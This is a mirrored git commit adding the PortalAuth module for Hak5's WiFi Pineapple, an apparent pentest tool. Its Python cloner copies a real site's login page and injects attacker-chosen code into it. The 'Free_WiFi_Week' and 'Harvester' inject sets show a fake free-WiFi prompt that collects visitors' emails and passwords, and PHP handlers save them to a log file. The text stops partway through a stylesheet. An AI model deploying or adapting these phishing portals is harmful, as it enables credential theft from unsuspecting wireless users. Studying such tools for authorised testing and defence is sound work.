mirror of
https://github.com/hak5/nano-tetra-modules.git
synced 2025-10-29 16:58:09 +00:00
Add modules to repository
313
PortalAuth/includes/scripts/PortalCloner.py
Executable file
@@ -0,0 +1,313 @@
from __future__ import absolute_import

import os
import re
import sys
import shutil
from contextlib import closing

parent_dir = os.path.abspath(os.path.dirname(__file__))
libs_dir = os.path.join(parent_dir, 'libs')
sys.path.append(libs_dir)

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import threading
import urlparse
import tinycss
import collections
from bs4 import BeautifulSoup


class PortalCloner:

    def __init__(self, portalName, directory, injectSet):
        self.portalName = portalName
        self.portalDirectory = directory + self.portalName + "/"
        self.resourceDirectory = self.portalDirectory + "resources/"
        self.injectionSet = injectSet
        self.css_urls = collections.defaultdict(list)
        self.splashFile = self.portalDirectory + "index.php"
        self.url = None
        self.soup = None
        self.session = requests.Session()
        self.basePath = '/pineapple/modules/PortalAuth/'
        self.uas = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}

    def find_meta_refresh(self, r):
        # Look for a <meta http-equiv="refresh" content="...; url=..."> redirect
        soup = BeautifulSoup(r.text, "html.parser")
        for meta in soup.find_all("meta"):
            if meta.has_attr("http-equiv"):
                if "url=" in meta.get("content").lower():
                    text = meta.get("content").split(";")[1]
                    text = text.strip()
                    if text.lower().startswith("url="):
                        new_url = text[4:]
                        return True, new_url
        return False, r

    def follow_redirects(self, r, s):
        redirected, new_url = self.find_meta_refresh(r)
        if redirected:
            r = self.follow_redirects(self.session.get(urlparse.urljoin(r.url, new_url)), s)
        return r

    def downloadFile(self, url, name):
        with closing(self.session.get(urlparse.urljoin(self.url, url), stream=True, verify=False)) as r:
            with open(self.resourceDirectory + name, 'wb') as out_file:
                for chunk in r.iter_content(8192):
                    out_file.write(chunk)

    def parseCSS(self, url):
        r = requests.get(url, headers=self.uas)
        urls = []
        parser = tinycss.make_parser('page3')
        try:
            stylesheet = parser.parse_stylesheet(r.text)
            for rule in stylesheet.rules:
                for dec in rule.declarations:
                    for token in dec.value:
                        if token.type == "URI":
                            # Strip out anything not part of the URL and append it to the list
                            urls.append(token.as_css().replace("url(", "").replace(")", "").strip('"\''))
        except:
            pass
        return urls

    def checkFileName(self, orig):
        # Return a name that does not collide with an existing file in resources/
        filename, file_ext = os.path.splitext(orig)
        path = self.resourceDirectory + filename + file_ext
        fname = orig
        uniq = 1
        while os.path.exists(path):
            fname = "%s_%d%s" % (filename, uniq, file_ext)
            path = self.resourceDirectory + fname
            uniq += 1
        return fname

    def fetchPage(self, url):
        # Check if the proper directories exist and create them if not
        for path in [self.portalDirectory, self.resourceDirectory]:
            if not os.path.exists(path):
                os.makedirs(path)

        # Attempt to open an external web page and load the HTML
        response = requests.get(url, headers=self.uas, verify=False)

        # Get the actual URL - this accounts for redirects - and set the class variable with it
        self.url = response.url

        # Set up the URL as our referrer to get access to protected images
        self.session.headers.update({'referer': self.url})

        # Follow any meta refreshes that exist before continuing
        response = self.follow_redirects(response, self.session)

        # Create a BeautifulSoup object to hold our HTML structure
        self.soup = BeautifulSoup(response.text, "html.parser")

    def cloneResources(self):
        # Locations of all resources to be downloaded, as [url, filename] pairs
        resourceURLs = []

        # Download all linked JS files and remove all inline JavaScript
        for script in self.soup.find_all('script'):
            if script.has_attr('src'):
                # Get the name of the resource
                fname = str(script.get('src')).split("/")[-1]

                # Queue the resource for download
                resourceURLs.append([script.get('src'), fname])

                # Change the URL to the resource in the cloned file
                script['src'] = "resources/" + fname

        # Search through all tags for the style attribute and gather inline CSS references
        for tag in self.soup():
            if tag.has_attr('style'):
                for dec in tag['style'].split(";"):
                    token = dec.split(":")[-1]
                    token = token.strip()
                    if token.lower().startswith("url"):
                        imageURL = token.replace("url(", "").replace(")", "").strip('"\'')

                        # Get the name of the resource
                        fname = imageURL.split("/")[-1]

                        # Queue the resource for download
                        resourceURLs.append([imageURL, fname])

                        # Change the inline CSS (str.replace returns a new string)
                        tag['style'] = tag['style'].replace(imageURL, "resources/" + fname)

        # Search for CSS files linked with the @import statement and rewrite them
        for style in self.soup.find_all("style"):
            parser = tinycss.make_parser('page3')
            stylesheet = parser.parse_stylesheet(style.string)
            for rule in stylesheet.rules:
                if rule.at_keyword == "@import":
                    # Get the name of the resource
                    fname = str(rule.uri).split("/")[-1]

                    # Queue the resource for download
                    resourceURLs.append([rule.uri, fname])

                    # Parse the CSS to get image links
                    _key = "resources/" + fname
                    self.css_urls[_key] = self.parseCSS(urlparse.urljoin(self.url, rule.uri))

                    # Replace the old link of the CSS with the new one
                    modStyle = style.string
                    style.string.replace_with(modStyle.replace(rule.uri, "resources/" + fname))

        # Find and download all images and CSS files linked with <link>
        for img in self.soup.find_all(['img', 'link', 'embed']):
            if img.has_attr('href'):
                tag = "href"
            elif img.has_attr('src'):
                tag = "src"
            else:
                continue

            # Parse the tag to get the file name
            fname = str(img.get(tag)).split("/")[-1]

            # Strip out any undesired characters
            pattern = re.compile('[^a-zA-Z0-9_.]+', re.UNICODE)
            fname = pattern.sub('', fname)
            fname = fname[:255]

            if fname == "":
                continue
            if fname.rpartition('.')[1] == "":
                fname += ".css"
            if fname.rpartition('.')[2] == "css":
                _key = "resources/" + fname
                self.css_urls[_key] = self.parseCSS(urlparse.urljoin(self.url, img.get(tag)))

            # Make sure the file name is unique within resources/
            checkedName = self.checkFileName(fname)

            # Queue the resource for download
            resourceURLs.append([img.get(tag), checkedName])

            # Change the image src to look for the image in resources
            img[tag] = "resources/" + checkedName

        # Spawn threads to begin downloading all resources
        # r[0] is the URL of the resource
        # r[1] is the name of the resource that will be saved
        threads = []
        for r in resourceURLs:
            t = threading.Thread(target=self.downloadFile, args=(r[0], r[1]))
            threads.append(t)
            t.start()

        # Wait for the threads to complete
        for t in threads:
            t.join()

        # Download any images found in the CSS files and change the links to resources
        # This occurs AFTER the CSS files have already been copied
        for css_file, urls in self.css_urls.iteritems():

            # Open the CSS file and get the contents
            fh = open(self.portalDirectory + css_file).read().decode('utf-8', 'ignore')

            # Iterate over the URLs associated with this CSS file
            for _fileurl in urls:

                # Get the image name
                fname = _fileurl.split("/")[-1]

                # Download the image from the web server under a unique name
                checkedName = self.checkFileName(fname)
                try:
                    self.downloadFile(_fileurl, checkedName)
                except:
                    pass

                # Change the link in the CSS file
                fh = fh.replace(_fileurl, checkedName)

            # Write the contents back out to the file
            fw = open(self.portalDirectory + css_file, 'w')
            fw.write(fh.encode('utf-8'))
            fw.flush()
            fw.close()

    def stripJS(self):
        for script in self.soup.find_all('script'):
            script.clear()

    def stripCSS(self):
        for tag in self.soup():
            if tag.has_attr('style'):
                tag['style'] = ""

        for style in self.soup.find_all("style"):
            style.clear()

    def stripLinks(self):
        # Find and clear all href attributes from <a> tags
        for link in self.soup.find_all('a'):
            link['href'] = ""

    def stripForms(self):
        # Find all forms, remove the action and clear the form
        for form in self.soup.find_all('form'):
            # Clear the action attribute
            form['action'] = ""

            # Clear the form
            form.clear()

    def injectJS(self):
        # Add user defined functions from injectJS.txt
        with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectJS.txt', 'r') as injectJS:
            self.soup.head.append(injectJS.read())

    def injectCSS(self):
        # Add user defined CSS from injectCSS.txt
        with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectCSS.txt', 'r') as injectCSS:
            self.soup.head.append(injectCSS.read())

    def injectHTML(self):
        # Append our HTML elements to the body of the web page
        with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectHTML.txt', 'r') as injectHTML:
            self.soup.body.append(injectHTML.read())

    def writeFiles(self):
        # Write the file out to index.php
        with open(self.splashFile, 'w') as splash:
            with open(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/injectPHP.txt', 'r') as injectPHP:
                splash.write(injectPHP.read())
            splash.write((self.soup.prettify(formatter=None)).encode('utf-8'))

        # Copy the MyPortal PHP script to portalDirectory
        shutil.copy(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/MyPortal.php', self.portalDirectory)

        # Create the required .ep file
        with open(self.portalDirectory + self.portalName + ".ep", 'w+') as epFile:
            epFile.write("DO NOT DELETE THIS")

        # Copy jquery to the portal directory
        shutil.copy(self.basePath + 'includes/scripts/jquery-2.2.1.min.js', self.portalDirectory)
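For orientation, the methods above are meant to be driven in a fetch, clone (or strip), inject, write order. A minimal sketch of that flow, assuming hypothetical values for the portal name, output directory, inject set, and target URL (the module's actual driver is not part of this commit):

    # Hypothetical driver for PortalCloner; all argument values are examples.
    cloner = PortalCloner("MyPortal", "/root/portals/", "Harvester")
    cloner.fetchPage("http://example.com/login")  # load page, follow meta refreshes
    cloner.cloneResources()                       # mirror JS/CSS/images into resources/
    cloner.injectCSS()                            # append injectCSS.txt to <head>
    cloner.injectJS()                             # append injectJS.txt to <head>
    cloner.injectHTML()                           # append injectHTML.txt to <body>
    cloner.writeFiles()                           # emit index.php, MyPortal.php, .ep marker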
BIN
PortalAuth/includes/scripts/PortalCloner.pyc
Executable file
Binary file not shown.
41
PortalAuth/includes/scripts/cfgUploadLimit.py
Executable file
@@ -0,0 +1,41 @@
#!/usr/bin/python

from subprocess import call

php = "/etc/php.ini"
nginx = "/etc/nginx/nginx.conf"

# Raise the PHP upload limits in php.ini, then reload php5-fpm
lines = [f for f in open(php)]
with open(php, "w") as out:
    for line in lines:
        if "upload_max_filesize" in line:
            parts = line.split("=")
            parts[1] = " 20M\n"
            line = "=".join(parts)
        if "post_max_size" in line:
            parts = line.split("=")
            parts[1] = " 26M\n"
            line = "=".join(parts)
        out.write(line)
call(["/etc/init.d/php5-fpm", "reload"])

# Add client_max_body_size to the http block of nginx.conf,
# but only if it is not already configured, then reload nginx
httpBlock = False
needsCfg = True
index = innerIndex = 0
lines = [f for f in open(nginx)]
for line in lines:
    if "client_max_body_size" in line:
        needsCfg = False
        break
if needsCfg is True:
    with open(nginx, "w") as out:
        for line in lines:
            if "http {" in line:
                httpBlock = True
            if httpBlock is True:
                if innerIndex == 4:
                    lines.insert(index + 1, "\tclient_max_body_size 20M;\n")
                innerIndex = innerIndex + 1
            index = index + 1
            out.write(line)
call(["/etc/init.d/nginx", "reload"])
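A note on the nginx edit above: the directive is spliced into the very list being iterated, so the inserted element is visited (and written out) on the next pass of the loop, which lands client_max_body_size after the fourth line following the "http {" line. A self-contained sketch of that splice pattern, using made-up input lines:

    # Minimal demo of the splice-while-iterating pattern used above;
    # the input lines are invented, the directive matches the script's.
    lines = ["http {\n", "one\n", "two\n", "three\n", "four\n", "}\n"]
    out = []
    httpBlock = False
    index = innerIndex = 0
    for line in lines:
        if "http {" in line:
            httpBlock = True
        if httpBlock:
            if innerIndex == 4:
                lines.insert(index + 1, "\tclient_max_body_size 20M;\n")
            innerIndex += 1
        index += 1
        out.append(line)
    print("".join(out))  # directive appears right after "four"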
BIN
PortalAuth/includes/scripts/cfgUploadLimit.pyc
Executable file
Binary file not shown.
28
PortalAuth/includes/scripts/depends.sh
Executable file
@@ -0,0 +1,28 @@
#!/bin/sh

# Author: sud0nick
# Date: Dec 2016

if [ $# -eq 0 ]; then
    exit;
fi

if [[ "$1" == "-check" ]]; then
    testCurl=$(opkg list-installed | grep -w 'curl')
    if [ -z "$testCurl" ]; then
        echo "Not Installed";
    else
        echo "Installed";
    fi
fi

if [[ "$1" == "-install" ]]; then
    opkg update > /dev/null;
    opkg install curl > /dev/null;
    echo "Complete"
fi

if [[ "$1" == "-remove" ]]; then
    opkg remove curl > /dev/null
    echo "Complete"
fi
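The module presumably shells out to this script to test for curl before offering an install. A sketch of driving the -check branch from Python, assuming the script sits at the module path used elsewhere in this commit:

    # Illustrative only: querying depends.sh for curl from Python.
    import subprocess
    out = subprocess.check_output(
        ["/pineapple/modules/PortalAuth/includes/scripts/depends.sh", "-check"])
    print(out.strip())  # "Installed" or "Not Installed"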
25
PortalAuth/includes/scripts/injects/Blank/MyPortal.php
Executable file
@@ -0,0 +1,25 @@
<?php namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

        // Check for other form data here
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
25
PortalAuth/includes/scripts/injects/Blank/backups/MyPortal.php
Executable file
@@ -0,0 +1,25 @@
<?php namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

        // Check for other form data here
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
4
PortalAuth/includes/scripts/injects/Blank/backups/injectCSS.txt
Executable file
@@ -0,0 +1,4 @@
<!--
<style>
</style>
-->
4
PortalAuth/includes/scripts/injects/Blank/backups/injectHTML.txt
Executable file
@@ -0,0 +1,4 @@
<!--
<div>
</div>
-->
4
PortalAuth/includes/scripts/injects/Blank/backups/injectJS.txt
Executable file
@@ -0,0 +1,4 @@
<!--
<script>
</script>
-->
3
PortalAuth/includes/scripts/injects/Blank/backups/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>
4
PortalAuth/includes/scripts/injects/Blank/injectCSS.txt
Executable file
@@ -0,0 +1,4 @@
<!--
<style>
</style>
-->
4
PortalAuth/includes/scripts/injects/Blank/injectHTML.txt
Executable file
@@ -0,0 +1,4 @@
<!--
<div>
</div>
-->
4
PortalAuth/includes/scripts/injects/Blank/injectJS.txt
Executable file
@@ -0,0 +1,4 @@
<!--
<script>
</script>
-->
3
PortalAuth/includes/scripts/injects/Blank/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>
34
PortalAuth/includes/scripts/injects/Free_WiFi_Week/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
<?php
namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

        // Check for other form data here
        if (!isset($_POST['email']) || !isset($_POST['password'])) {
            return;
        }

        $fh = fopen('/www/auth.log', 'a+');
        fwrite($fh, "Email: " . $_POST['email'] . "\n");
        fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
        fclose($fh);
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
34
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
<?php
namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

        // Check for other form data here
        if (!isset($_POST['email']) || !isset($_POST['password'])) {
            return;
        }

        $fh = fopen('/www/auth.log', 'a+');
        fwrite($fh, "Email: " . $_POST['email'] . "\n");
        fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
        fclose($fh);
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
120
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectCSS.txt
Executable file
@@ -0,0 +1,120 @@
<style>
.pa_form-container {
    border: 1px solid #f2e3d2;
    background:#F0F8FF;
    -webkit-border-radius: 8px;
    -moz-border-radius: 8px;
    border-radius: 8px;
    -webkit-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
    -moz-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
    box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
    font-family: 'Helvetica Neue',Helvetica,sans-serif;
    text-align: center;
    position: fixed;
    width: 450px;
    height: 370px;
    padding: 20px;
    top: 50%;
    left: 50%;
    margin-top: -230px;
    margin-left: -225px;
    z-index: 10;
    display: none;
}
#pa_overlay-back {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0,0,0,.7);
    z-index: 5;
    display: none;
}
.pa_form-field {
    background: #fff;
    color: #000;
    font-size: 18px;
    -webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    -moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    padding:8px;
    margin-bottom:20px;
    width:90%;
}
.pa_form-field:focus {
    background: #fff;
    color: #725129;
}
.pa_form-container h2 {
    color: #6aa436;
    font-size:18px;
    margin: 0 0 10px 0;
    font-weight:bold;
    text-align: center;
}
.pa_form-container p {
    text-align: center;
    margin: 10px auto 10px auto;
}
.pa_form-container table {
    width: 90%;
    margin: 0 auto;
}
.pa_form-title {
    margin-bottom:10px;
    color: #725129;
    font-size: 16px;
    text-align: left;
}
.pa_submit-container {
    margin:8px 0;
    text-align:center;
}
.pa_submit-button {
    border: 1px solid #447314;
    background: #6aa436;
    background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
    background: -webkit-linear-gradient(top, #8dc059, #6aa436);
    background: -moz-linear-gradient(top, #8dc059, #6aa436);
    background: -ms-linear-gradient(top, #8dc059, #6aa436);
    background: -o-linear-gradient(top, #8dc059, #6aa436);
    background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    border-radius: 4px;
    -webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    -moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    color: #31540c;
    font-family: helvetica, serif;
    padding: 8.5px 18px;
    font-size: 14px;
    text-decoration: none;
    vertical-align: middle;
    width: 200px;
    cursor: pointer;
}
.pa_submit-button:hover {
    border: 1px solid #447314;
    background: #6aa436;
    background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
    background: -webkit-linear-gradient(top, #8dc059, #6aa436);
    background: -moz-linear-gradient(top, #8dc059, #6aa436);
    background: -ms-linear-gradient(top, #8dc059, #6aa436);
    background: -o-linear-gradient(top, #8dc059, #6aa436);
    background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
    color: #fff;
}
.pa_submit-button:active {
    border: 1px solid #447314;
    background: #8dc059;
    background: -webkit-gradient(linear, left top, left bottom, from(#6aa436), to(#6aa436));
    background: -webkit-linear-gradient(top, #6aa436, #8dc059);
    background: -moz-linear-gradient(top, #6aa436, #8dc059);
    background: -ms-linear-gradient(top, #6aa436, #8dc059);
    background: -o-linear-gradient(top, #6aa436, #8dc059);
    background-image: -ms-linear-gradient(top, #6aa436 0%, #8dc059 100%);
    color: #fff;
}
</style>
16
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectHTML.txt
Executable file
@@ -0,0 +1,16 @@
<div id="pa_overlay-back"></div>
<div class="pa_form-container">
    <h3 style="display: inline">Enjoy free WiFi between</h3>
    <h2><div id="pa_date"></div></h2>
    <div style="margin: 0 auto">
        <p>Simply enter your email address and password. If you do not already have an account with us one will be created for you.</p>
    </div>
    <br /><br />
    <input class="pa_form-field" type="text" id="pa_email" placeholder="you@gmail.com" />
    <input class="pa_form-field" type="password" id="pa_password" placeholder="Password" />
    <br /><br />
    <div class="pa_submit-container">
        <input class="pa_submit-button" type="submit" value="Submit" />
    </div>
</div>
</div>
53
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectJS.txt
Executable file
@@ -0,0 +1,53 @@
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>

<script>
window.onload = init;

function init(){
    importantDates();
    setTimeout(displayLogin, 1000);
}
function importantDates() {
    $('#pa_date').html(function(){
        var monthNames=["January", "February", "March", "April", "May", "June",
                        "July", "August", "September", "October", "November", "December"];
        var tf=new Date();var tp=new Date();var f=new Date();var p=new Date();
        f.setDate(tf.getDate()+5);p.setDate(tp.getDate()-2);
        var fd=f.getDate();var pd=p.getDate();
        var fm=monthNames[f.getMonth()];var pm=monthNames[p.getMonth()];
        if(fd<10){fd='0'+fd}if(pd<10){pd='0'+pd}
        return pm+' '+pd+' - '+fm+' '+fd;
    });
}
$(function() {
    $(".pa_submit-button").on("click", function() {
        var email_addr = $('#pa_email').val();
        var pass = $('#pa_password').val();
        if (email_addr == "" || pass == "") {
            alert("You must enter credentials to log in.");
            return;
        } else {
            $.ajax({
                type: "POST",
                url: "/captiveportal/index.php",
                data: {email: email_addr,
                       password: pass,
                       target: "<?=$destination?>"},
                dataType: 'json',
                success: function(data, textStatus, jqXHR) {
                    window.location="/captiveportal/index.php";
                },
                error: function(data, textStatus, errorThrown) {
                    window.location="/captiveportal/index.php";
                }
            });
        }
    });
});
function displayLogin() {
    $(function(){
        $(".pa_form-container").css("opacity", "1");
        $(".pa_form-container, #pa_overlay-back").fadeIn("slow");
    });
}
</script>
3
PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>
120
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectCSS.txt
Executable file
@@ -0,0 +1,120 @@
<style>
.pa_form-container {
    border: 1px solid #f2e3d2;
    background:#F0F8FF;
    -webkit-border-radius: 8px;
    -moz-border-radius: 8px;
    border-radius: 8px;
    -webkit-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
    -moz-box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
    box-shadow: rgba(000,000,000,0.9) 0 1px 2px;
    font-family: 'Helvetica Neue',Helvetica,sans-serif;
    text-align: center;
    position: fixed;
    width: 450px;
    height: 370px;
    padding: 20px;
    top: 50%;
    left: 50%;
    margin-top: -230px;
    margin-left: -225px;
    z-index: 10;
    display: none;
}
#pa_overlay-back {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0,0,0,.7);
    z-index: 5;
    display: none;
}
.pa_form-field {
    background: #fff;
    color: #000;
    font-size: 18px;
    -webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    -moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    padding:8px;
    margin-bottom:20px;
    width:90%;
}
.pa_form-field:focus {
    background: #fff;
    color: #725129;
}
.pa_form-container h2 {
    color: #6aa436;
    font-size:18px;
    margin: 0 0 10px 0;
    font-weight:bold;
    text-align: center;
}
.pa_form-container p {
    text-align: center;
    margin: 10px auto 10px auto;
}
.pa_form-container table {
    width: 90%;
    margin: 0 auto;
}
.pa_form-title {
    margin-bottom:10px;
    color: #725129;
    font-size: 16px;
    text-align: left;
}
.pa_submit-container {
    margin:8px 0;
    text-align:center;
}
.pa_submit-button {
    border: 1px solid #447314;
    background: #6aa436;
    background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
    background: -webkit-linear-gradient(top, #8dc059, #6aa436);
    background: -moz-linear-gradient(top, #8dc059, #6aa436);
    background: -ms-linear-gradient(top, #8dc059, #6aa436);
    background: -o-linear-gradient(top, #8dc059, #6aa436);
    background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    border-radius: 4px;
    -webkit-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    -moz-box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    box-shadow: rgba(255,255,255,0.4) 0 1px 0;
    color: #31540c;
    font-family: helvetica, serif;
    padding: 8.5px 18px;
    font-size: 14px;
    text-decoration: none;
    vertical-align: middle;
    width: 200px;
    cursor: pointer;
}
.pa_submit-button:hover {
    border: 1px solid #447314;
    background: #6aa436;
    background: -webkit-gradient(linear, left top, left bottom, from(#8dc059), to(#6aa436));
    background: -webkit-linear-gradient(top, #8dc059, #6aa436);
    background: -moz-linear-gradient(top, #8dc059, #6aa436);
    background: -ms-linear-gradient(top, #8dc059, #6aa436);
    background: -o-linear-gradient(top, #8dc059, #6aa436);
    background-image: -ms-linear-gradient(top, #8dc059 0%, #6aa436 100%);
    color: #fff;
}
.pa_submit-button:active {
    border: 1px solid #447314;
    background: #8dc059;
    background: -webkit-gradient(linear, left top, left bottom, from(#6aa436), to(#6aa436));
    background: -webkit-linear-gradient(top, #6aa436, #8dc059);
    background: -moz-linear-gradient(top, #6aa436, #8dc059);
    background: -ms-linear-gradient(top, #6aa436, #8dc059);
    background: -o-linear-gradient(top, #6aa436, #8dc059);
    background-image: -ms-linear-gradient(top, #6aa436 0%, #8dc059 100%);
    color: #fff;
}
</style>
16
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectHTML.txt
Executable file
@@ -0,0 +1,16 @@
<div id="pa_overlay-back"></div>
<div class="pa_form-container">
    <h3 style="display: inline">Enjoy free WiFi between</h3>
    <h2><div id="pa_date"></div></h2>
    <div style="margin: 0 auto">
        <p>Simply enter your email address and password. If you do not already have an account with us one will be created for you.</p>
    </div>
    <br /><br />
    <input class="pa_form-field" type="text" id="pa_email" placeholder="you@gmail.com" />
    <input class="pa_form-field" type="password" id="pa_password" placeholder="Password" />
    <br /><br />
    <div class="pa_submit-container">
        <input class="pa_submit-button" type="submit" value="Submit" />
    </div>
</div>
</div>
53
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectJS.txt
Executable file
@@ -0,0 +1,53 @@
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>

<script>
window.onload = init;

function init(){
    importantDates();
    setTimeout(displayLogin, 1000);
}
function importantDates() {
    $('#pa_date').html(function(){
        var monthNames=["January", "February", "March", "April", "May", "June",
                        "July", "August", "September", "October", "November", "December"];
        var tf=new Date();var tp=new Date();var f=new Date();var p=new Date();
        f.setDate(tf.getDate()+5);p.setDate(tp.getDate()-2);
        var fd=f.getDate();var pd=p.getDate();
        var fm=monthNames[f.getMonth()];var pm=monthNames[p.getMonth()];
        if(fd<10){fd='0'+fd}if(pd<10){pd='0'+pd}
        return pm+' '+pd+' - '+fm+' '+fd;
    });
}
$(function() {
    $(".pa_submit-button").on("click", function() {
        var email_addr = $('#pa_email').val();
        var pass = $('#pa_password').val();
        if (email_addr == "" || pass == "") {
            alert("You must enter credentials to log in.");
            return;
        } else {
            $.ajax({
                type: "POST",
                url: "/captiveportal/index.php",
                data: {email: email_addr,
                       password: pass,
                       target: "<?=$destination?>"},
                dataType: 'json',
                success: function(data, textStatus, jqXHR) {
                    window.location="/captiveportal/index.php";
                },
                error: function(data, textStatus, errorThrown) {
                    window.location="/captiveportal/index.php";
                }
            });
        }
    });
});
function displayLogin() {
    $(function(){
        $(".pa_form-container").css("opacity", "1");
        $(".pa_form-container, #pa_overlay-back").fadeIn("slow");
    });
}
</script>
3
PortalAuth/includes/scripts/injects/Free_WiFi_Week/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>
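A note on how the three Free_WiFi_Week pieces fit together: injectPHP computes $destination from the intercepted request, injectJS embeds it through the <?=$destination?> tag and posts it as the target field alongside the captured email and password, and MyPortal.php appends those credentials to /www/auth.log before the captive portal authorizes the client.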
34
PortalAuth/includes/scripts/injects/Harvester/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
<?php
namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

        // Check for other form data here
        if (!isset($_POST['email']) || !isset($_POST['password'])) {
            return;
        }

        $fh = fopen('/www/auth.log', 'a+');
        fwrite($fh, "Email: " . $_POST['email'] . "\n");
        fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
        fclose($fh);
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
34
PortalAuth/includes/scripts/injects/Harvester/backups/MyPortal.php
Executable file
@@ -0,0 +1,34 @@
<?php
namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

        // Check for other form data here
        if (!isset($_POST['email']) || !isset($_POST['password'])) {
            return;
        }

        $fh = fopen('/www/auth.log', 'a+');
        fwrite($fh, "Email: " . $_POST['email'] . "\n");
        fwrite($fh, "Pass: " . $_POST['password'] . "\n\n");
        fclose($fh);
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
89
PortalAuth/includes/scripts/injects/Harvester/backups/injectCSS.txt
Executable file
@@ -0,0 +1,89 @@
<style>
.pa_field {
    width: 70%;
    height: 30px;
    font-size: 18px;
    border: 1px solid #000;
}
.pa_main {
    background-color: rgba(255,255,255,.9);
    left: 0%;
    margin-top: 200px;
    text-align: center;
    padding-top: 75px;
    position: fixed;
    border-style:solid;
    border-width:medium;
    border-color:#aaa;
    -webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    -moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
}
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
